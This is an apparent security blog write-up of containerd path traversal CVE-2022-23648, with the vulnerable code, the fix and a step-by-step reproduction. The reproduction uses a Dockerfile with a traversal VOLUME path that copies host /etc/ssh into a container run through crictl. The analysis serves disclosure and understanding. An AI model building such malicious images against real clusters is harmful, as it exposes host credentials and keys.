2022-03-26

The spec

Path traversal is a classic class of security issue. Because it is a logic issue, it keeps appearing in software no matter how quickly technology develops. This post analyzes a path traversal issue in containerd that was discovered by Felix Wilhelm. The first part explains the relevant spec, so that we know what the feature is for and where the implementation goes wrong.

Containers have the concept of a volume. Without a volume, any data we change inside a container disappears when the container is destroyed. Volumes exist to persist data or to share data between containers. A volume is often (if not always) implemented with a bind mount. In Docker we can add a volume with -v.

            root@ubuntu:/home/test/CVE-2022-23648# mkdir test
            root@ubuntu:/home/test/CVE-2022-23648# echo "data in host" > test/aaa
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm  -v /home/test/CVE-2022-23648/test:/test ubuntu bash
            root@c201b6a39be2:/# mount | grep test
            /dev/sda5 on /test type ext4 (rw,relatime,errors=remount-ro)
            root@ecc59c1f5bc4:/# ls /test/
            aaa
            root@ecc59c1f5bc4:/# cat /test/aaa 
            data in host
            root@ecc59c1f5bc4:/# echo "data in guest" >> /test/aaa
            root@ecc59c1f5bc4:/# exit
            exit
            root@ubuntu:/home/test/CVE-2022-23648# cat test/aaa 
            data in host
            data in guest

Running ‘docker inspect containerid’ on the host shows the volume under “Mounts”.

            "Mounts": [
            {
                    "Type": "bind",
                    "Source": "/home/test/CVE-2022-23648/test",
                    "Destination": "/test",
                    "Mode": "",
                    "RW": true,
                    "Propagation": "rprivate"
            }
            ],

The OCI image spec also has a field named ‘Volumes’. The definition says it is ‘A set of directories describing where the process is likely to write data specific to a container instance’.

Let’s test this feature. First, create a Dockerfile.

            from ubuntu:20.04

            VOLUME /volume-test/

Build it and start a container. We can see there is a mount in the container.

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME /volume-test/
            ---> Running in 2b744c0f90ff
            Removing intermediate container 2b744c0f90ff
            ---> 1cf01e39ec82
            Successfully built 1cf01e39ec82
            Successfully tagged volume-test:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test bash
            root@a301238d982c:/# ls -lh /volume-test/
            total 0
            root@a301238d982c:/# mount | grep volume     
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)

‘docker inspect’ shows the following mount information.

            "Mounts": [
            {
                    "Type": "volume",
                    "Name": "e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98",
                    "Source": "/var/lib/docker/volumes/e05d07c283a443133ba5635dfe13d2241a68087e96c47e5521febe9f7eb5bd98/_data",
                    "Destination": "/volume-test",
                    "Driver": "local",
                    "Mode": "",
                    "RW": true,
                    "Propagation": ""
            }
            ],

‘docker image inspect’ shows the following:

            "Volumes": {
                    "/volume-test/": {}
            },

As we can see, the ‘Source’ is generated by the runtime itself and the ‘Destination’ is the path given to VOLUME.

As Felix points out, when this configuration is converted into an OCI runtime configuration, containerd tries to follow the spec at https://github.com/opencontainers/image-spec/blob/main/conversion.md, which says:

“Implementations SHOULD provide mounts for these locations such that application data is not written to the container’s root filesystem. If a converter implements conversion for this field using mountpoints, it SHOULD set the destination of the mountpoint to the value specified in Config.Volumes. An implementation MAY seed the contents of the mount with data in the image at the same location”

The key phrase here is ‘seed the contents of the mount with data in the image at the same location’. It means that if the image already has data in the volume directory, the implementation may copy that original data into the mount. Docker does exactly this:

            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            RUN mkdir /volume-test
            RUN echo "volume data" > /volume-test/aaa
            VOLUME /volume-test/

            root@ubuntu:/home/test/CVE-2022-23648# docker build -t volume-test1 .
            Sending build context to Docker daemon  3.584kB
            Step 1/4 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/4 : RUN mkdir /volume-test
            ---> Using cache
            ---> a05c3161c55d
            Step 3/4 : RUN echo "volume data" > /volume-test/aaa
            ---> Running in 60702a1547f5
            Removing intermediate container 60702a1547f5
            ---> 4702775454c2
            Step 4/4 : VOLUME /volume-test/
            ---> Running in 14963733faf9
            Removing intermediate container 14963733faf9
            ---> cc3e2700af76
            Successfully built cc3e2700af76
            Successfully tagged volume-test1:latest
            root@ubuntu:/home/test/CVE-2022-23648# docker run -it --rm volume-test1 bash
            root@20939034b463:/# mount | grep volume
            /dev/sda5 on /volume-test type ext4 (rw,relatime,errors=remount-ro)
            root@20939034b463:/# ls /volume-test/
            aaa
            root@20939034b463:/# cat /volume-test/aaa 
            volume data

As we can see, the original data is in the volume. This is what ‘seeding’ the data means. Digging further, we find that ‘aaa’ exists at three paths on the host.

            root@ubuntu:/home/test# find /var/lib/ -name aaa
            /var/lib/docker/volumes/ed8dac626f22fe409ff7159aeb1cc59d90f506876ca655fd5896f007bbbfed36/_data/aaa
            /var/lib/docker/overlay2/50c147cecab7d2310c82188c95f3e5711c4e8c096488ba275e143f21afe05123/diff/volume-test/aaa
            /var/lib/docker/overlay2/45535f60b70e7185f78837ccac706cb03f3efcb7e0b01dd409aa1d314d8f857c/merged/volume-test/aaa

The first is the copy in the volume. The second and third are the same file from the container image: one in the layer’s diff directory, the other in the merged overlay view. The first file is copied from the image’s directory.

Now we know how ‘VOLUME’ travels from the OCI image configuration to the OCI runtime configuration. To seed the data, the converter needs to copy the data from the original image into the container’s mount directory.

The vulnerability

The vulnerability occurs in containerd’s seeding process. Say we set VOLUME to “/../../../../../../../../var/lib/kubelet/pki/”; the copy then becomes:

            copy /var/lib/docker/overlay2/xxx/merged//../../../../../../../../var/lib/kubelet/pki/    /var/lib/docker/volumes/yyy/_data/

containerd tries to copy files from the image into the volume, but it does not validate the source path, and that path is controlled by the OCI image configuration.

The ‘volumeMounts’ function in ‘cri/server/container_create.go’ creates mounts from ‘Volumes’.

            func (c *criService) volumeMounts(containerRootDir string, criMounts []*runtime.Mount, config *imagespec.ImageConfig) []*runtime.Mount {
                    ...
                    var mounts []*runtime.Mount
                    for dst := range config.Volumes {
                            ...
                            volumeID := util.GenerateID()
                            src := filepath.Join(containerRootDir, "volumes", volumeID)
                            // addOCIBindMounts will create these volumes.
                            mounts = append(mounts, &runtime.Mount{
                                    ContainerPath:  dst,
                                    HostPath:       src,
                                    SelinuxRelabel: true,
                            })
                    }
                    return mounts
            }

‘ContainerPath’ comes straight from the image configuration, so it can be the malicious path.

Later, the code that consumes these mounts cleans ‘HostPath’ but not ‘ContainerPath’.

            if len(volumeMounts) > 0 {
                    mountMap := make(map[string]string)
                    for _, v := range volumeMounts {
                            mountMap[filepath.Clean(v.HostPath)] = v.ContainerPath
                    }
                    opts = append(opts, customopts.WithVolumes(mountMap))
            }

Finally, ‘WithVolumes’ in ‘pkg/cri/opts/container.go’ performs the copy.

	for host, volume := range volumeMounts {
		// The volume may have been defined with a C: prefix, which we can't use here.
		volume = strings.TrimPrefix(volume, "C:")
		for _, mountPath := range mountPaths {
			src := filepath.Join(mountPath, volume)
			if _, err := os.Stat(src); err != nil {
				if os.IsNotExist(err) {
					// Skip copying directory if it does not exist.
					continue
				}
				return fmt.Errorf("stat volume in rootfs: %w", err)
			}
			if err := copyExistingContents(src, host); err != nil {
				return fmt.Errorf("taking runtime copy of volume: %w", err)
			}
		}
	}

Here ‘mountPath’ is a host directory backing part of the container rootfs, ‘volume’ is the malicious path, and ‘host’ is the host directory that will be mounted into the container. The ‘src’ argument passed to ‘copyExistingContents’ looks like ‘/xxx/xx/../../../../../../../../../etc’, which ‘filepath.Join’ cleans to ‘/etc’ on the host filesystem. So ‘copyExistingContents’ copies host filesystem data into the container’s volume.
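The effect of ‘filepath.Join’ on such a path is easy to check in isolation. The sketch below is a standalone illustration on Linux: ‘joinUnchecked’ is a hypothetical wrapper I added, and the rootfs path is made up.

```go
package main

import (
	"fmt"
	"path/filepath"
)

// joinUnchecked (hypothetical name) mirrors the vulnerable pattern:
// an image-controlled volume path is joined onto the rootfs path
// without checking that the result stays inside the rootfs.
func joinUnchecked(rootfs, volume string) string {
	// filepath.Join also calls filepath.Clean, which resolves ".."
	// lexically and therefore can climb above rootfs.
	return filepath.Join(rootfs, volume)
}

func main() {
	// Made-up rootfs location, for illustration only.
	rootfs := "/run/containerd/demo/rootfs"

	fmt.Println(joinUnchecked(rootfs, "/volume-test/"))
	fmt.Println(joinUnchecked(rootfs, "/../../../../../../../../etc/ssh"))
}
```

The first line printed is ‘/run/containerd/demo/rootfs/volume-test’, inside the rootfs as expected. The second is ‘/etc/ssh’: the ‘..’ components consume the whole rootfs prefix and the result points at the host.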

The fix is in this commit.

            @@ -112,7 +112,10 @@ func WithVolumes(volumeMounts map[string]string) containerd.NewContainerOpts {
                                    // The volume may have been defined with a C: prefix, which we can't use here.
                                    volume = strings.TrimPrefix(volume, "C:")
                                    for _, mountPath := range mountPaths {
            -				src := filepath.Join(mountPath, volume)
            +				src, err := fs.RootPath(mountPath, volume)
            +				if err != nil {
            +					return fmt.Errorf("rootpath on mountPath %s, volume %s: %w", mountPath, volume, err)
            +				}
                                            if _, err := os.Stat(src); err != nil {
                                                    if os.IsNotExist(err) {
                                                            // Skip copying directory if it does not exist.

The fix simply replaces ‘filepath.Join’ with ‘fs.RootPath’, which evaluates the path, including any symlinks in ‘volume’, and keeps the result bounded within the root directory.
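To get a feeling for what “bounded” means, here is a minimal lexical-only sketch. ‘boundedJoin’ is a hypothetical helper of mine, not the implementation of ‘fs.RootPath’: it does not resolve symlinks at all, so it is not a substitute for the real fix, only an illustration of the idea.

```go
package main

import (
	"fmt"
	"path/filepath"
)

// boundedJoin (hypothetical, lexical only) anchors the untrusted path
// at "/" before cleaning it, so ".." components cannot climb above the
// root, and only then joins it onto root.
// Assumption: no symlinks are involved; this sketch never touches disk.
func boundedJoin(root, untrusted string) string {
	cleaned := filepath.Clean("/" + untrusted)
	return filepath.Join(root, cleaned)
}

func main() {
	// Made-up rootfs location, for illustration only.
	rootfs := "/run/containerd/demo/rootfs"

	fmt.Println(boundedJoin(rootfs, "/volume-test/"))
	fmt.Println(boundedJoin(rootfs, "/../../../../../../../../etc/ssh"))
}
```

With this helper the malicious path resolves to ‘/run/containerd/demo/rootfs/etc/ssh’, which stays inside the rootfs. A symlink inside the image could still redirect a purely lexical check like this one, which is presumably why the fix uses a function that also evaluates symlinks.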

Reproduce

The vulnerability itself is easy to understand, but I failed to reproduce it with docker or ctr. Fu Wei, a containerd maintainer, told me I should use crictl, because the vulnerable code ships in the CRI plugin of containerd. This part is mostly about how to set up the crictl environment. Along the way I asked Bonan and Fu Wei a lot of questions, thanks! The setup process mostly follows this post.

Download crictl and set the environment

From the cri-tools release page, download v1.23.0.

            root@ubuntu:/home/test# tar -xzvf crictl-v1.23.0-linux-amd64.tar.gz -C /usr/bin
            crictl
            root@ubuntu:/home/test# crictl  --version
            crictl version v1.23.0

Create a new file at /etc/crictl.yaml with the following configuration.

            runtime-endpoint: unix:///var/run/containerd/containerd.sock
            image-endpoint: unix:///var/run/containerd/containerd.sock
            timeout: 10
            debug: false

Create the containerd config file /etc/containerd/config.toml

            root@ubuntu:/home/test# mkdir /etc/containerd
            root@ubuntu:/home/test# vi /etc/containerd/config.toml
            root@ubuntu:/home/test# systemctl  restart containerd
            root@ubuntu:/home/test# cat /etc/containerd/config.toml 
            [plugins]
            [plugins.cri]
            sandbox_image = "rancher/pause:3.1"
            [plugins.cri.cni]
            bin_dir = "/opt/cni/bin"
            conf_dir = "/etc/cni/net.d"
            [plugins.cri.registry]
            [plugins.cri.registry.mirrors]
                    [plugins.cri.registry.mirrors."docker.io"]
                    endpoint = ["https://docker.mirrors.ustc.edu.cn"]
            [plugins.linux]
            shim = "containerd-shim"
            runtime = "runc"
            runtime_root = ""
            no_shim = false
            shim_debug = false

Install the CNI plugins. Download them from the CNI plugins release page.

            root@ubuntu:/home/test# mkdir -p /opt/cni/bin
            root@ubuntu:/home/test# tar -zxvf cni-plugins-linux-amd64-v1.1.1.tgz  -C /opt/cni/bin
            ./
            ./macvlan
            ./static
            ./vlan
            ./portmap
            ./host-local
            ./vrf
            ./bridge
            ./tuning
            ./firewall
            ./host-device
            ./sbr
            ./loopback
            ./dhcp
            ./ptp
            ./ipvlan
            ./bandwidth
            root@ubuntu:/home/test# vi /etc/cni/net.d/10-mynet.conf
            root@ubuntu:/home/test# vi /etc/cni/net.d/99-loopback.conf
            root@ubuntu:/home/test# cat /etc/cni/net.d/10-mynet.conf
            {
            "cniVersion": "0.2.0",
            "name": "mynet",
            "type": "bridge",
            "bridge": "cni0",
            "isGateway": true,
            "ipMasq": true,
            "ipam": {
                    "type": "host-local",
                    "subnet": "10.22.0.0/16",
                    "routes": [
                    { "dst": "0.0.0.0/0" }
                    ]
            }
            }

            root@ubuntu:/home/test# cat /etc/cni/net.d/99-loopback.conf
            {
            "cniVersion": "0.2.0",
            "name": "lo",
            "type": "loopback"
            }

Create container and trigger vulnerability

  • Pull the pause image

              root@ubuntu:/home/test# crictl  pull registry.aliyuncs.com/google_containers/pause:3.6
              Image is up to date for sha256:6270bb605e12e581514ada5fd5b3216f727db55dc87d5889c790e4c760683fee
              root@ubuntu:/home/test# crictl image
              IMAGE                                           TAG                 IMAGE ID            SIZE
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
              root@ubuntu:/home/test# ctr -n k8s.io image tag registry.aliyuncs.com/google_containers/pause:3.6 k8s.gcr.io/pause:3.6
              k8s.gcr.io/pause:3.6
              root@ubuntu:/home/test# crictl  image
              IMAGE                                           TAG                 IMAGE ID            SIZE
              k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
    
  • Create the malicious image

Build it.

            root@ubuntu:/home/test/CVE-2022-23648# echo "host" > /etc/ssh/host_file
            root@ubuntu:/home/test/CVE-2022-23648# vi Dockerfile 
            root@ubuntu:/home/test/CVE-2022-23648# docker build -t cve-2022-23648 .
            Sending build context to Docker daemon  3.584kB
            Step 1/2 : from ubuntu:20.04
            ---> ff0fea8310f3
            Step 2/2 : VOLUME  /../../../../../../../../etc/ssh
            ---> Running in 06720320c1f6
            Removing intermediate container 06720320c1f6
            ---> b253bcd6793c
            Successfully built b253bcd6793c
            Successfully tagged cve-2022-23648:latest
            root@ubuntu:/home/test/CVE-2022-23648# cat Dockerfile 
            from ubuntu:20.04

            VOLUME  /../../../../../../../../etc/ssh

            root@ubuntu:/home/test/CVE-2022-23648# 

  • Import it in containerd

              root@ubuntu:/home/test/CVE-2022-23648# docker save cve-2022-23648 > cve-2022-23648.tar
              root@ubuntu:/home/test/CVE-2022-23648# ctr -n k8s.io image import  cve-2022-23648.tar 
              unpacking docker.io/library/cve-2022-23648:latest (sha256:6280c4ac2a16fb85d1c15d4c43055a32ce226c04bbdb0358c8f0b39d93aa869a)...done
              root@ubuntu:/home/test/CVE-2022-23648# crictl  image 
              IMAGE                                           TAG                 IMAGE ID            SIZE
              docker.io/library/cve-2022-23648                latest              b253bcd6793c2       75.1MB
              k8s.gcr.io/pause                                3.6                 6270bb605e12e       302kB
              registry.aliyuncs.com/google_containers/pause   3.6                 6270bb605e12e       302kB
    
  • Run the malicious image

              root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
              ba2d0c46c5502c2b9bd7027333c3779095d5e297ef165bfe50b863a0fb82d8c2
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              3bf95742d0fb3       10 seconds ago      Ready               test                default             1                   (default)
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
              ba2d0c46c5502       docker.io/library/cve-2022-23648:latest   14 seconds ago      Running             test                0                   3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it ba2d0c46c5502 bash
              root@ubuntu:/# ls /etc/ssh/
              root@ubuntu:/# ls /etc/ssh
    

Hmm, no host data. What’s wrong? According to this page, my containerd version already contains the fix.

            root@ubuntu:/home/test# containerd --version
            containerd github.com/containerd/containerd 1.5.5-0ubuntu3~20.04.2 
            root@ubuntu:/home/test# which containerd
            /usr/bin/containerd
            root@ubuntu:/home/test# stat /usr/bin/containerd
            File: /usr/bin/containerd
            Size: 60305392  	Blocks: 117784     IO Block: 4096   regular file
            Device: 805h/2053d	Inode: 5769129     Links: 1
            Access: (0755/-rwxr-xr-x)  Uid: (    0/    root)   Gid: (    0/    root)
            Access: 2022-03-25 23:43:13.235999616 -0700
            Modify: 2022-02-25 12:15:25.000000000 -0800
            Change: 2022-03-14 06:37:43.871583849 -0700
            Birth: -

  • Install a lower version of containerd.

              root@ubuntu:/home/test/CVE-2022-23648# crictl stopp 3bf95742d0fb3
              Stopped sandbox 3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl rmp 3bf95742d0fb3
              Removed sandbox 3bf95742d0fb3
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE               CREATED             STATE               NAME                ATTEMPT             POD ID
    
    
              root@ubuntu:/home/test/CVE-2022-23648# crictl run --no-pull container-config.json pod-config.json 
              fe4ef77ab8e31434ab73e952c69710634a2cc2ec4a2f072cac45436941e7cc6b
              root@ubuntu:/home/test/CVE-2022-23648# crictl pods
              POD ID              CREATED             STATE               NAME                NAMESPACE           ATTEMPT             RUNTIME
              1ecc6bee60024       4 seconds ago       Ready               test                default             1                   (default)
              root@ubuntu:/home/test/CVE-2022-23648# crictl ps
              CONTAINER           IMAGE                                     CREATED             STATE               NAME                ATTEMPT             POD ID
              fe4ef77ab8e31       docker.io/library/cve-2022-23648:latest   7 seconds ago       Running             test                0                   1ecc6bee60024
              root@ubuntu:/home/test/CVE-2022-23648# crictl exec -it fe4ef77ab8e31 bash
              root@ubuntu:/# ls /etc/ssh
              host_file  ssh_config  ssh_config.d
              root@ubuntu:/# cat /etc/ssh/host_file 
              host
              root@ubuntu:/# exit
              exit
              root@ubuntu:/home/test/CVE-2022-23648# containerd --version
              containerd github.com/containerd/containerd 1.3.3-0ubuntu2 
    

Finally, the vulnerability is reproduced: inside the container, /etc/ssh contains the host’s files.

The end

After reproducing this vulnerability, I wanted to know why docker and ctr did not work, and discussed it at length with Fu Wei. Here are my conclusions (I am not sure they are 100% accurate):

CRI is the interface between Kubernetes and the container runtime. OCI is the spec for how to run a container. So some software is needed between CRI and OCI: it must implement the CRI interface for Kubernetes, convert each CRI request into the low-level OCI spec, and launch the container. containerd and cri-o are this kind of software. Kubernetes can also use Docker to run containers, but that requires dockershim to speak the CRI interface.

  • containerd. containerd is a container runtime used to manage containers. It exposes not only the CRI interface but also other container management interfaces.
  • ctr. ctr is containerd’s client test tool; it is not related to CRI.
  • crictl. crictl is a CLI for CRI-compatible container runtimes. It talks to a CRI runtime to manage containers.
  • docker. Docker is not related to CRI; it is a separate container management tool.

As the vulnerability is in the CRI plugin of containerd, we can only trigger it through the CRI path. In this post I used crictl to trigger it. It can also be triggered from Kubernetes when containerd is used as the CRI runtime.

Reference

containerd: Insecure handling of image volumes

使用containerd单独创建容器 (Creating containers with containerd alone)
